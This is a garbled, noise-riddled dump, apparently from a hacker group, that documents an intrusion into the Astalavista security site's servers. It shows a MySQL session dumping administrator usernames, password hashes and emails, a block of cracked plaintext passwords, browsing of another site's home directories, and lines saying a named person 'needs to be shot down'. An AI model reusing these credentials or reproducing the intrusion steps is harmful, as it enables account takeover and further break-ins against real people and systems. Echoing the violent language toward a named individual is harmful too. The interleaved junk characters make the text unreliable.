; k; z7 f7 S# f- s <language>en-us</language>% a0 w. h- ?2 l9 v
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate># c4 m/ U- g7 ]: L
<docs>http://blogs.law.harvard.edu/tech/rss</docs>1 f; _$ r9 m c5 @$ ^# ^+ L4 |( d
<generator>Astalavista.com</generator>' w" K# K1 E$ i: F" d
<webMaster>[email protected]</webMaster>’ . $items . ‘
7 m1 M# |5 F# u2 p </channel>& i" J4 O4 o e! e6 K3 k; A- S
</rss>’;6 }* c8 D0 I' @& \- E
, N7 e- I8 R& P @- g; u
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
, P7 ~+ l% V# s3 M! i) |$ T unlink (FULLPATH . ‘/feed/exploits.xml’);
6 l) u4 O4 V* \9 j! ? }
& `1 E7 m5 q) |$ K+ p) ]6 Z. V2 k7 `
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);5 {' ?5 P% S2 L& ]) k* Q" Q9 a
[snip]. _) r9 s# k: f, A
3 a7 n" L8 d) b+ F' zsh-3.2$ cat exploits.sh
9 L8 n8 h1 `: d5 c& ~) R#!/bin/sh
- v* _- K& S5 ^: H& g& L+ L1 U r/ ]" ^( n
###########################################################
. S* W9 \% D2 H( n) O7 L# #
5 E/ b4 c) g. p" F8 N0 X8 H# Title: milw0rm exploits adder #
6 Z" D) u1 [: b4 [# Description: Add all milw0rm exploits to the #
& K( P3 D' A% B$ W/ d; f( B! `# Astalavista.com database #
3 c' S- b% Z( ]# a3 k2 J$ L# # Y3 V7 R0 I8 W8 i; n
# Company: Astalavista Group #5 Q) Y, R- Z* ]. w5 a9 p. z
# Author: Paulo M. Santos #
& a2 g5 t% }& Z* ?) a# E-Mail: 链接标记[email protected] #
4 T/ D- ^' a2 c1 q4 m- ^9 C$ B! ~# #& t0 n. Q7 o9 R7 `2 [. t* S
###########################################################. u' N+ y3 R O# p& l2 I
g5 p9 P- ?+ q, F8 W+ c
# path: S" e# w6 L/ o- J$ m
this_path=/home/com/public_html/modifications/cronjobs
7 p" R: G u! E$ X# j
9 M+ M2 L8 Z) y# c6 d# change directory- z% C) a/ M8 y. x1 L
cd $this_path
1 K5 [* I) C7 |9 Fcd tmp/
# Z' h5 j/ ^$ {) ]' \9 h$ y3 B& @+ H+ { e q
# delete files# i3 {% E' F, a' o) U
rm -rf milw0rm.tar.* &
. L1 Z1 M2 a; X5 |8 u p2 frm -rf milw0rm/ &
0 H2 g$ m# h3 ]: H+ q5 ?# b( m3 |, P, f5 K8 R; n0 n; t' z$ }
# wget milw0rm paket# s/ o: m0 e! |, C
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]" R- e. V/ ^6 w4 P" ?' e8 Q
- P4 I8 A1 Q5 {5 }" r1 |( k
# extract milw0rm paket d$ D: u4 u8 R& s# t* @
tar -xvf milw0rm.tar.bz2
* b: n* Q% V0 I7 P
, u8 f6 W$ m9 Q- W k6 X# change owner
# l7 W( }2 U N4 k6 }( echown -R com .
4 N6 T( ?6 P8 r# M, q( v3 J- e) `9 ?chgrp -R com .
$ _, n) R9 Y8 k" m. H5 x# Y
5 U7 }. K0 o! A# n# l: M! {' @# execute php script
9 C0 K9 f% Y6 acd $this_path) N% x/ y+ v+ G/ N" P; h
php -q exploits.php
% A, i- p# T4 Q( b
1 Y) J6 R1 Y/ W7 f8 P1 G( d2 p# delete files1 a/ r: ]" Q7 W; s9 ?( f, ?" y- o
rm -rf tmp/milw0rm.tar.*: J* U9 |9 `+ B5 U, X
rm -rf tmp/milw0rm/9 {1 K6 S t9 S i
2 K9 i2 j# o( g9 r3 csh-3.2$ echo “Paulo M. Santos needs to be shot down.”
$ ?' t, k% x' V/ N: i6 e: APaulo M. Santos needs to be shot down.9 n: L7 o9 q# J1 V! J% h! P: K
$ v) n" T' F- r2 W8 a
mysql -u contrexxuser2 -p" \: {, s0 V* ~' e- y+ }
Enter password:
9 \0 ]5 @. H @* `2 J) KWelcome to the MySQL monitor. Commands end with ; or \g.
4 C% `0 U; E0 ^- uYour MySQL connection id is 261694
' o$ i4 {3 C9 [$ }' j. ]( rServer version: 5.0.45-community-log MySQL Community Edition (GPL)# I% G( ?" N1 |8 \) {
* g$ d! ` V) o" F1 K% d. |: _: |
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
" I+ H& F( _5 ]. `1 j7 R/ }) o
3 s# r3 H6 l8 O/ ^8 tmysql> show databases;
5 r. A8 d+ g* _! @6 ^, h+——————–+! ~" x9 ]4 U) m8 v9 \8 E7 u
| Database |
1 u) R) S. {: J! T, d1 ~+——————–+
6 ] X1 n1 B& M& k Y8 I( f. c7 k' L| information_schema |
+ _7 U0 V3 g, _| com_contrexx2 |% m" {# a* }% ^# Z' j" r4 H
| com_contrexx2_live |" R% g) `" f, E
| test |
0 E) V5 p9 e- c m5 Z- X( X! G+——————–+: W9 Y9 w8 X8 n0 F+ G1 ~& h' f
4 rows in set (0.00 sec)
% W0 T- U! o+ F4 s; p9 U# D% O; ]9 B6 B
mysql> use com_contrexx2_live
3 f" ^+ q: B5 c2 p2 t7 EDatabase changed% B, \* Y% q& @2 j
mysql> show tables;) B# A7 Q s b- a
+————————————————–+8 v* a4 q6 w2 P2 [" n" w( g
| Tables_in_com_contrexx2_live |' l; h" N% j- b" G5 i
+————————————————–+& {' h9 f: b% ~# v* \
| cc_banner_counter | g4 o, e" g8 b, }2 m* l% d
| cc_search_counter |+ Z/ ^* O( b, T6 d" S- J1 B& Q
| contrexx_access_group_dynamic_ids | @# P/ m6 ~5 m: B* O! [0 p6 c
| contrexx_access_group_static_ids |! B/ C5 O$ H7 Y% [; G& y3 L
| contrexx_access_rel_user_group |1 @* _# `- n$ m: I: I4 ^
| contrexx_access_settings |
5 T! z3 T) k ~! X& l! ?1 e, a| contrexx_access_user_attribute |
) Z% i p. B1 ^| contrexx_access_user_attribute_name |
; {" l# ` f: x& m( `4 b8 N| contrexx_access_user_attribute_value |4 C$ X8 A m c }3 x; V
| contrexx_access_user_core_attribute |/ l: w/ j, m" V L! P
| contrexx_access_user_groups |
+ _& x, K3 c, \8 m% f4 y, n| contrexx_access_user_mail |) H9 _5 [' O$ Z
| contrexx_access_user_profile |
$ y' U. T! A, g3 J| contrexx_access_user_title |
1 v |/ S- M8 j. }: Y% K% V2 || contrexx_access_user_validity |
Z- Z" O u; O W; V$ _( A| contrexx_access_users |
* [. z- E' x* s6 H' u+ `$ k" Z| contrexx_backend_areas |0 F, y: L0 Z" n" Z/ R+ v% W
| contrexx_backups |
1 `) k" a9 p6 m| contrexx_content |
G) s2 e* b6 H- H| contrexx_content_history | A4 @' J0 ~2 [7 r `' g' A8 F) `
| contrexx_content_logfile |
$ a" D* f* b3 T" s- \' U- Z| contrexx_content_navigation |0 l3 M9 S. I7 l6 O1 J8 u
| contrexx_content_navigation_history |: m' C; [4 e1 g
| contrexx_ids |5 r' H Q4 L E& b+ j
| contrexx_languages |
; `) A4 x- y3 B. v| contrexx_lib_country |8 ^" W }$ c5 `9 e6 b3 k. t
| contrexx_log |. |5 c2 X* z+ J/ o6 K
| contrexx_module_alias_source |
S5 M0 j1 p! X9 ]' s| contrexx_module_alias_target |" k' p' z( h3 } i5 Z
| contrexx_module_block_blocks |
% y7 c" |5 y. g' `| contrexx_module_block_rel_lang |0 c& k1 \% u) _# [) G7 {) u
| contrexx_module_block_rel_pages |1 N, D( I* x" p2 ]
| contrexx_module_block_settings |
G) \0 H: e' _8 D8 f" j| contrexx_module_blog_categories |! A- o/ T' B+ W) Y7 c, w
| contrexx_module_blog_comments | }( ?* `- o' N
| contrexx_module_blog_message_to_category |
3 [6 c+ S( y' [- _, y$ l' E# P| contrexx_module_blog_messages |) {5 W9 M* m0 k, o1 u5 j
| contrexx_module_blog_messages_lang |
" i. o1 G+ K; H* B/ \1 m4 O| contrexx_module_blog_networks |* T f2 o: ^' o. g8 G; C) N) C
| contrexx_module_blog_networks_lang |
4 f, j1 u: ^/ u* S( B| contrexx_module_blog_settings |, z: o2 s7 R$ x" @' o+ ?5 Q. h
| contrexx_module_blog_votes |
( b& B% o5 }& ]' L| contrexx_module_calendar |9 r5 X3 y( U' U. p2 w
| contrexx_module_calendar_access |. r8 `6 Q# Y* D0 D p; y
| contrexx_module_calendar_categories |: ], d0 C$ E- {7 Q
| contrexx_module_calendar_form_data |
1 c% D$ a, F. V" [" [+ m| contrexx_module_calendar_form_fields |
# F! D: c/ c1 l/ P/ V6 x O| contrexx_module_calendar_registrations |9 m5 ^$ [/ r e* o7 _0 U R
| contrexx_module_calendar_settings |
O3 Z# h8 S0 x| contrexx_module_calendar_style |( j% x" U. X7 X {' ^/ \
| contrexx_module_contact_form |
" Y; k* @4 r* D| contrexx_module_contact_form_data |
1 w) c* u2 S5 h) a3 v; f| contrexx_module_contact_form_field |
/ H$ A6 j- d( L/ {) }- D) @9 \6 `| contrexx_module_contact_settings |
- K! s) V5 o8 ^: L" `4 k" E0 k4 _| contrexx_module_data_categories |+ l2 @, a7 }) v" L* \8 { U
| contrexx_module_data_message_to_category |
6 G$ J$ L& L7 c3 z! @' x| contrexx_module_data_messages |
+ v0 A6 {1 ^" N| contrexx_module_data_messages_lang |
1 U) G$ V/ |/ ?; q" Q& ~; j- E8 ^| contrexx_module_data_placeholders |
6 I: D" S, _5 ~0 W/ V| contrexx_module_data_settings |
z4 N7 _& N3 s4 F( q4 H/ w( @| contrexx_module_directory_access |3 K# z1 J9 t4 I( \- j+ y
| contrexx_module_directory_categories |
) K# I2 v! |8 a/ ^$ w& b* ^| contrexx_module_directory_dir |: b1 s4 r- h. G+ q4 a+ \
| contrexx_module_directory_inputfields |
' L3 w7 @% ?' W2 `- h/ t" P| contrexx_module_directory_levels | L) S* M; b% T3 O4 N4 n7 ]6 D7 E
| contrexx_module_directory_mail |
' v/ _; B4 G! G% z4 N. w1 _9 G8 y; X| contrexx_module_directory_rel_dir_cat |# R& `9 {5 y! c" ~
| contrexx_module_directory_rel_dir_level |' [0 D1 t+ s; R# a- g: R* F$ b; t
| contrexx_module_directory_settings |
0 j: {& c( t# i6 Q! {| contrexx_module_directory_settings_google |
0 f; n0 ~. f; w4 r7 F/ s* B, v| contrexx_module_directory_vote |3 Q% B' h9 }9 h6 @
| contrexx_module_docsys |1 p/ s3 k+ J: H- j5 W8 N% l) D4 U) t5 O
| contrexx_module_docsys_categories |
{* a" h$ J+ r( [0 A+ U| contrexx_module_egov_configuration |) M; s% e3 Q* F, V# H5 M5 ]
| contrexx_module_egov_orders |
: @! @! o2 d; ]- Z| contrexx_module_egov_product_calendar |
6 c7 E6 h4 }- ] l1 X. Y- C| contrexx_module_egov_product_fields |+ {! l) f o9 W4 |" R5 ~6 f
| contrexx_module_egov_products |
: R; t- D, F% Y( X! @| contrexx_module_egov_settings |
! V) _* e( i @2 V- V- b( a| contrexx_module_exploits |$ r: r. v, l1 b5 n6 m; g6 l# O! O
| contrexx_module_exploits_categories |2 K! k8 A, x. k f
| contrexx_module_feed_category |- n( A% a" T" b% H( m/ K' o2 g
| contrexx_module_feed_news |
: U) d. l3 `! ?| contrexx_module_feed_newsml_association |* a8 P8 ^# M4 b$ d" C" }" q
| contrexx_module_feed_newsml_categories |
& q+ _0 I) M" w* X% K& ?- \$ F, v| contrexx_module_feed_newsml_documents |/ z. ~/ D+ S7 t+ j
| contrexx_module_feed_newsml_providers |
3 H6 |. Z& @' N+ \$ D| contrexx_module_forum_access |
3 Q/ \: d, p( ]+ Y2 Y2 {| contrexx_module_forum_categories |
$ w) \3 W" K6 ^$ \| contrexx_module_forum_categories_lang |' v2 {. Z0 `& Z; Z0 {/ ?7 R! v
| contrexx_module_forum_notification | u6 p) n" Q* R/ k: M* c
| contrexx_module_forum_postings |6 K V8 I5 p+ ^* ~' |: u
| contrexx_module_forum_rating |
& d' D5 c( g# q6 S; b( ]| contrexx_module_forum_settings |( W- S+ v; q: M7 C7 r( U6 }
| contrexx_module_forum_statistics |
" g; I" U2 v# b. u4 {5 N| contrexx_module_gallery_categories |4 i# D9 |# Z; \$ _
| contrexx_module_gallery_comments |3 n" z- `% d% K% K. Y( G
| contrexx_module_gallery_language |4 C8 l n9 |6 H0 H9 T, [5 k
| contrexx_module_gallery_language_pics |: G7 M* `7 o5 p5 _- r# O6 m! \
| contrexx_module_gallery_pictures |
* t5 ~ A' B* q# Q4 w& R6 D9 A! U| contrexx_module_gallery_settings |
; @, n+ T3 q8 Y7 @# w| contrexx_module_gallery_votes |1 R' P+ d: g0 O! E' u a
| contrexx_module_guestbook |6 l* P$ z. u& c w) Q
| contrexx_module_guestbook_settings |( V% z, k& T: M' I( e/ z1 i0 {
| contrexx_module_livecam | d5 r9 l S) B2 X* o7 w- n
| contrexx_module_livecam_settings |
" h& O* u) e/ l h) a) _| contrexx_module_market |
# a1 Z7 [ |' l' V| contrexx_module_market_access |5 L! H( A1 \/ @/ \$ y) l
| contrexx_module_market_categories |
8 J, R. ?; q0 m, S. J% E2 k2 j0 K| contrexx_module_market_mail |5 Q" ^- ^0 S8 w+ k0 m
| contrexx_module_market_paypal |
% x' c1 T& t1 ^7 v) Q9 y| contrexx_module_market_settings |
, K7 [2 E; Q6 _4 J3 g& m| contrexx_module_market_spez_fields |4 \! q. @6 f7 A3 a( o
| contrexx_module_mediadir_access |
9 k5 R, X4 K5 `/ B) G| contrexx_module_mediadir_categories |
' Q7 l9 K; E4 Q$ a8 f| contrexx_module_mediadir_comments |# P5 d2 i/ d, w! [) ^- ]1 }# w
| contrexx_module_mediadir_dir |
( E" z6 c/ r0 g; a| contrexx_module_mediadir_inputfields |; [; w1 N2 E( z
| contrexx_module_mediadir_levels |
3 k i# V' R- n7 C% l| contrexx_module_mediadir_mail |+ D/ J1 l$ E0 ~9 {: B
| contrexx_module_mediadir_rel_dir_cat |, L7 g2 }2 ~; ]6 D# ]7 x
| contrexx_module_mediadir_rel_dir_level |: x9 h O' ^- ]3 \ D( v
| contrexx_module_mediadir_reports |
2 q# g, V* j F- u4 V3 \1 `" N/ W| contrexx_module_mediadir_settings |
8 U( ^( G7 c, ? J/ @% ^$ @; \| contrexx_module_mediadir_settings_google |
! B- x0 `& \6 f9 ^! n| contrexx_module_mediadir_vote |
$ b; U" l; g6 J, m6 L3 a; P| contrexx_module_memberdir_directories |
$ _' I; }, _3 g) x| contrexx_module_memberdir_name |5 L! q/ D4 T2 }+ l% b; a
| contrexx_module_memberdir_settings |
* Y( b! k; q/ Q6 o U8 I6 X| contrexx_module_memberdir_values |: D7 P/ R# x# X7 z( h5 r0 b+ z- H I
| contrexx_module_nettools_allowed_groups |' F6 l" f- b( q' _0 {$ I
| contrexx_module_nettools_settings |
$ l( z4 w8 `" G: _| contrexx_module_news |- d# m- ~2 D* e4 V8 D3 Z: [
| contrexx_module_news_access |4 p" E) L3 G1 d1 p& t
| contrexx_module_news_categories |
5 b3 d+ C* n) Z| contrexx_module_news_settings |0 v2 q' \0 v0 [8 i
| contrexx_module_news_teaser_frame |
7 i, Z$ y P% k( K" G| contrexx_module_news_teaser_frame_templates |
+ Z( G/ L q% J9 s| contrexx_module_news_ticker |
0 a# ~% k$ f9 z, A2 T| contrexx_module_newsletter |
% V! |+ G' L3 U; e' u. _| contrexx_module_newsletter_attachment |
G( e) V$ ^' n- {2 A! N( I| contrexx_module_newsletter_category |4 j% ]7 |- Y& \' E; U
| contrexx_module_newsletter_confirm_mail |) ?$ s: _& Z' U* g; [
| contrexx_module_newsletter_rel_cat_news |/ A, d, k4 H4 V" B
| contrexx_module_newsletter_rel_user_cat |) M( Y% x' X! d1 I+ ^- J! X0 ?
| contrexx_module_newsletter_settings |! v/ b& Y1 e- C
| contrexx_module_newsletter_template |
$ t, R; q; p* e5 S. Y4 H8 Z; m| contrexx_module_newsletter_tmp_sending |; l3 f ?3 c- z, J* J2 i3 w/ h
| contrexx_module_newsletter_user |5 K& f: m' F& c* V
| contrexx_module_newsletter_user_title |
( y: l* w! j9 W- S; U/ U| contrexx_module_onlinetools_defaultports | S. ], V+ z- L m
| contrexx_module_onlinetools_defaultports_back |
0 G4 k1 k3 p+ }: V4 S, L| contrexx_module_onlinetools_geolitecity_blocks |1 r3 E5 d5 F3 a9 m0 i3 K6 P
| contrexx_module_onlinetools_geolitecity_country |
2 y$ A$ q5 r( B+ `1 O+ T: {4 G| contrexx_module_onlinetools_geolitecity_location |
$ p" {* |- Z8 o7 U2 y7 k; E| contrexx_module_podcast_category |9 z" I1 v5 J/ P& q' c- O
| contrexx_module_podcast_medium |
" m, r$ N3 `- ^7 I- G" i: @| contrexx_module_podcast_rel_category_lang |6 X0 T" l) `6 d( R3 M) J
| contrexx_module_podcast_rel_medium_category |
6 ?% @; {# |0 K4 O: W1 Z| contrexx_module_podcast_settings |
6 |( Y3 @; d, {2 i7 v& n& R3 b! k| contrexx_module_podcast_template |
& u9 \* X8 v* t| contrexx_module_proxydb |
. u! c2 I5 T/ C| contrexx_module_recommend |
# `$ ?" m4 P% V4 ], e* \- H| contrexx_module_repository |
$ i: E, J) Q- ^ E2 T& ?8 X| contrexx_module_securitynews_cats |
0 Q4 Y* V# W- U& a$ ^| contrexx_module_securitynews_feeds |6 i" y. z" N0 [+ |1 ]2 A
| contrexx_module_securitynews_news |
1 s% W( r- r5 k/ Y# v" ^| contrexx_module_shop_categories |" q- D+ G6 N* w6 N& B
| contrexx_module_shop_config |$ |# v) a# p5 Q% [; i" o
| contrexx_module_shop_countries |, t4 B" t5 Y1 j- V7 D+ m: [
| contrexx_module_shop_currencies |
7 O+ L$ p+ Q2 X' O| contrexx_module_shop_customers |
4 s: l& F) x4 z! x$ e| contrexx_module_shop_importimg |: f" R0 w6 g9 E8 w
| contrexx_module_shop_lsv |% t5 u0 B" e# F5 J Q2 u
| contrexx_module_shop_mail |
6 e4 |6 R% a1 V| contrexx_module_shop_mail_content |8 s* L8 [ z1 _$ t Q/ T
| contrexx_module_shop_manufacturer |
& _- D. r7 k3 x| contrexx_module_shop_order_items |
; T5 C3 [. w) t& S- ]5 Q| contrexx_module_shop_order_items_attributes |
' B; n8 L8 \* v" O| contrexx_module_shop_orders |
. H" `6 A0 _( m, {$ U: d3 C| contrexx_module_shop_payment |
! R4 |: c* q6 C5 W| contrexx_module_shop_payment_processors |
! j0 R6 _& b P: a' r& g& k| contrexx_module_shop_pricelists |* m- N( a3 x3 j3 y0 M! B, {
| contrexx_module_shop_products |
" V& F2 T- g+ D| contrexx_module_shop_products_attributes |) O, q$ D2 Z$ l Y! ?
| contrexx_module_shop_products_attributes_name |
. {$ m5 G/ D- {8 R. z6 F| contrexx_module_shop_products_attributes_value |
6 g2 U/ H" [# Z0 |( z| contrexx_module_shop_products_downloads |! \. S; C1 x6 ^# l+ m! Q
| contrexx_module_shop_rel_countries |
: ^9 \. r1 Q7 c" [. l| contrexx_module_shop_rel_payment |
6 A* j5 d+ l, Q, }| contrexx_module_shop_rel_shipment |5 P, Q9 I$ K5 [' M& z9 ~8 U! j
| contrexx_module_shop_shipment_cost |4 x. n: I- g" I& z6 b
| contrexx_module_shop_shipper |. D- K/ R* y' q
| contrexx_module_shop_vat |
. D7 v+ t- \3 H$ m| contrexx_module_shop_zones |
& y x4 o! p1 ]' T: Z0 X! }4 D" O| contrexx_module_u2u_address_list |
7 m5 K. M; \5 u; j. Q, v+ @: L9 A| contrexx_module_u2u_message_log |
2 H" y& [% d5 g) ~' }* R4 }| contrexx_module_u2u_sent_messages |2 r% X: g# K9 A8 Z( S1 c5 E
| contrexx_module_u2u_settings |6 r2 X% h3 x' m! N. U& ~
| contrexx_module_u2u_user_log |
# H7 z9 P! ]8 S/ K# K6 F| contrexx_modules |" |; S! P! `( Q E: W9 j# t
| contrexx_sessions |
9 Z" A8 Y% S8 o' L1 B: h4 H| contrexx_settings |
( {/ A4 S9 \, U| contrexx_settings_smtp |
2 r' {4 S. j% j+ |8 I| contrexx_skins |
* L& l9 T4 X7 T3 T* \1 E6 [| contrexx_stats_browser |! `8 |- k$ B! p& r/ ~4 e5 T
| contrexx_stats_colourdepth |$ i5 ~: R! g) `, \3 p
| contrexx_stats_config |
1 [) d1 {, s# u8 || contrexx_stats_country |. n7 a$ k3 m3 L# h
| contrexx_stats_hostname |$ O- w. B" _6 `! @% L" N
| contrexx_stats_javascript |
6 ?$ T: u; D$ o; v5 p| contrexx_stats_operatingsystem |$ E$ o" E7 Y' D! Y5 h9 t
| contrexx_stats_referer |9 @ e7 X: K) t1 y' a; T
| contrexx_stats_requests |
/ K( N" }( a' S0 ~! S7 K# G| contrexx_stats_requests_summary |
) {* C K: f6 p| contrexx_stats_screenresolution |
2 ?& {1 v8 Z* e| contrexx_stats_search |
% L4 Y' A9 u( e: {| contrexx_stats_spiders |$ H% {/ K& [6 q, i3 w" Y
| contrexx_stats_spiders_summary | D, w5 f* k' A7 A( g6 ?
| contrexx_stats_visitors |, C) Q! ~# e6 z- y' i
| contrexx_stats_visitors_summary |
! [) h% u- {* a& ?| contrexx_voting_additionaldata |8 u6 g0 l- m# f$ t9 j
| contrexx_voting_email |
6 s+ v! V8 e$ n1 K& z1 P" Y| contrexx_voting_rel_email_system |
1 M- v$ i: Z% j4 G+ M2 B| contrexx_voting_results |
' b% L- L( y5 O: G: n9 d| contrexx_voting_system |
* C4 I' A" C, T3 n| foo |
0 B1 [2 u% w& z3 m; U5 V+————————————————–+$ R1 C! C5 e2 U. Q2 I2 ~
227 rows in set (0.01 sec)5 q) J) h5 p4 b. r& e
9 A( H& x; B! V' j* \1 hmysql> select count(*) as skids from contrexx_access_users;
1 z* A; n+ g+ B& j9 g+——-+
$ U) t6 x! B8 [( O( ]* b4 t1 b| skids |5 s3 a$ M! r; ^5 L4 P: w; X# h
+——-+
" k4 e$ [8 Q% v' m- O$ V| 53699 |( G% d$ H1 M, Y* `
+——-+1 R4 A! H4 @3 n
1 row in set (0.00 sec)
: E' ?( y$ u, |+ I* Q4 V0 N6 H" M
0 b2 [ n, B# Amysql> describe contrexx_access_users;
3 ^' w) q: F. K; h6 ?& i+——————+——————————————+——+—–+————–+—————-+$ P0 w2 X2 d. h: p1 Y- b4 I. S, Q
| Field | Type | Null | Key | Default | Extra |
Z' _$ y0 K& Q/ g+——————+——————————————+——+—–+————–+—————-+
5 g; `3 p, d3 A) {* ]| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
8 G' a, h4 s1 M& x5 ?| is_admin | tinyint(1) unsigned | NO | | 0 | |
. G" W' q) h0 G/ s7 L5 m| username | varchar(40) | YES | MUL | NULL | |& h1 [/ z8 r. k, T! D( w5 ~
| password | varchar(32) | YES | | NULL | |
* i" h! g8 B1 b$ U& H| regdate | int(14) unsigned | NO | | 0 | |1 `0 F! D D: e/ v2 @: y- P1 K
| expiration | int(14) unsigned | NO | | 0 | |3 Z* q" R* |0 ^- h
| validity | int(10) unsigned | NO | | 0 | |
6 F5 V( m! x8 y: x' m| last_auth | int(14) unsigned | NO | | 0 | |* R7 @4 f" E" N2 K. D; h1 P
| last_activity | int(14) unsigned | NO | | 0 | |. V( B* X W4 Y v# N' p
| email | varchar(255) | YES | | NULL | |) ` W z W2 ?/ x- v6 W7 b y X
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |& S) |' e, M7 S2 a: P/ h
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
% l5 K# N; A* I) N8 D0 j( f| backend_lang_id | int(2) unsigned | NO | | 0 | |
! C5 l: q$ y7 N6 a5 V* @0 r$ N| active | tinyint(1) | NO | | 0 | |" T7 p0 ]/ N: f
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
+ L( ]% {8 g* I| restore_key | varchar(32) | NO | | | |* ?. m) p3 L% \4 h8 b
| restore_key_time | int(14) unsigned | NO | | 0 | |
* Z( l6 ~& C9 @1 ~. ]9 l! h| u2u_active | enum(’0′,’1′) | NO | | 1 | |/ V2 B9 j# {; P* X( y
+——————+——————————————+——+—–+————–+—————-+
: y& E$ B2 z- I* ~% C" Z18 rows in set (0.00 sec)) w* q: E1 c9 f2 r+ e# G
/ X5 z/ g% M0 e
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
* U) @3 M3 `' n+————+———————————-+—————————–+
' Z+ O$ t: X; R/ \+ ?| username | password | email |
! p: ~& v( k- ~" E- T. q+————+———————————-+—————————–+
/ n. `/ A9 n7 b4 B; [) d0 s0 @| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记[email protected] |2 l/ n7 {' L& _- P
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记[email protected] |& M8 V" l% v0 j5 K
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记[email protected] |% `8 o' ?; Z/ I
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记[email protected] |
2 Z5 t) D2 w6 O1 G n+————+———————————-+—————————–+
0 Z! h; \, U6 W4 rows in set (0.04 sec)7 c! O, L. N8 @6 h% ~9 N
& j1 N8 |( b: f& H$ B9 B/ n
mysql> exit;
, e9 X* I/ U6 d) S) XBye' ~# q7 n1 G0 A/ [; w. ~- y5 {
& `, M5 m0 M$ W0 f- b. v0 l& o
[~] There you go, your “team of security and IT professionals” is a joke.
/ A/ `" A" `& {! R8 _/ \$ V/ Q$ v/ g& W8 X
+——————————+
7 U' |+ l1 G- s+ d: Hsystem:f82BN3+_*8 m: B7 I7 [ ^7 f2 _" W& g" v
Be1er0ph0r:belerophor4astacom
' q5 q O* S8 i Iprozac:asta4cms!
4 R7 b. i$ W& O* _8 gcommander:mpbdaagf6m
; H7 J2 ?' }" F5 L$ W9 ^sykadul:ak29eral
* Q0 h& ]' A9 z% X4 ]9 w4 {+——————————+' Y F. s, G4 b w" c: M2 w# N: h
) A# B7 z/ r: Q- h
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)9 c$ N& w+ s/ Y" C( m$ j* W
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
4 l! H h3 g2 ?3 S6 Q! [4 ?1 S1 t" K C+ v: R: a/ N B
[~] Lets move to astalavista.net now,3 [1 ^0 [! x6 Z. _5 z1 t1 k
. k' W! M: h8 Z, |' y3 \, q, Y. u
From <链接标记[url]https://www.astalavista.net/[/url]>:
- Q, T: ?6 ^. S* e# p5 p>> Everyone knows that the best defense is a good offense.
/ B; l. C* Q9 y( d8 N% A; R. w>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.1 _! U" |' V# E# ]% H5 k
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
# i% E+ H- V$ ?6 ^7 ~>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
* `" Y/ B& Z2 H2 c5 w0 E# Y0 f, C0 \3 ]
>> Go ahead, try and hack our server . in a completely legal way!
0 t5 q) k* t% e" d>> Learn by doing: We offer our members tricky tasks and challenges on an. N3 I% ~3 N3 F0 ?
>> ongoing basis so you can test your knowledge and abilities. You can also
' |* W! e/ Z+ S. v' }>> demonstrate what you.ve mastered by taking part in regular hacker contests' ?) r. A% L& R8 G+ G3 F
>> and war games4 I9 v' K: K2 @8 {: I6 o
6 G ?) |! M) S# d7 N) p5 S
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!7 s" n/ \! ]( ]' g, ^
; a% E' M$ Y) O5 X* T8 c, U
[-] Tricky task: Find home dir of astalavista.net
, u* x4 A& Z( \9 u
( x* {3 Q; R: U5 ?% S; b U" ash-3.2$ ls -la ~astanet
: I% s2 m' n* { b5 b! O6 @total 48 i1 P7 h+ ~0 _4 b
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .9 G$ ^2 L( S# w" L/ C
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- t- H4 R. i' D" d4 |9 J2 Y0 V2 Pdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth$ C1 D1 c! m" Y4 `( n5 F
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history3 P' h& b+ G* x- B! I, q
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( r: K& [+ U& O( }' m+ p& a-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
2 x1 g0 u; _. z0 K. R3 d# G3 V5 R-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
5 x1 Y; |: }: V1 pdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
0 P! U) a* E) j+ g7 ]6 B( Udrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap: k5 c0 x9 O8 [9 F% v
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
" v6 P+ Z# r7 K! {& _2 O+ E$ }lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
9 K; e# j9 ^: e) t. U-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
: X* ]6 n; n2 m; f3 b
. |) E5 @1 {/ p% n& Y; I) U' {; p& e7 psh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
1 p3 k: }$ ]8 Y3 L/ w, Ksh-3.2$ ls -la
# N' t u; Z+ U6 B9 A+ X% ttotal 200
( m, k- S( }+ Rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .* N4 N% j& v" b( _; c
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
3 D3 K4 P+ v: K/ v" |$ Ldrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
8 M6 i2 {1 I$ L% d3 hdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
